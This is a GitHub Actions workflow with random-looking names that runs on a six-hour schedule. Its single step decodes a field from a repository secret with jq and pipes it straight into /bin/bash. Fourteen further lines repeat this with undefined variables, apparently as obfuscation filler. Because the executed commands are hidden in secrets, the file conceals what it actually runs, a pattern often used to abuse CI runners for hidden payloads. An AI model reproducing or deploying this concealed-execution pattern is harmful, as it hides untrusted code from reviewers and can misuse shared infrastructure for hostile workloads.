name: fibergucci
on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fibergucci
        env:
          seupd690: ${{ secrets.seupd690 }}
        run: |
          echo $seupd690 | jq -r .qnzqz8851 | /bin/bash
          echo $uzgpl46 | jq -r .hjtds89236 | /bin/bash
          echo $i168 | jq -r .fwo54 | /bin/bash
          echo $ys7694 | jq -r .az14765 | /bin/bash
          echo $xbr05993 | jq -r .cgj43051 | /bin/bash
          echo $y01 | jq -r .uwxnr7705 | /bin/bash
          echo $tphmh0327 | jq -r .ij32 | /bin/bash
          echo $io409 | jq -r .xei37 | /bin/bash
          echo $xfd20087 | jq -r .untzm7 | /bin/bash
          echo $liomi0 | jq -r .sbtkk86 | /bin/bash
          echo $tkb75 | jq -r .zvil7119 | /bin/bash
          echo $y3189 | jq -r .sqj22 | /bin/bash
          echo $h044 | jq -r .mw50394 | /bin/bash
          echo $szmh6 | jq -r .touw498 | /bin/bash
          echo $rq35 | jq -r .p52 | /bin/bash

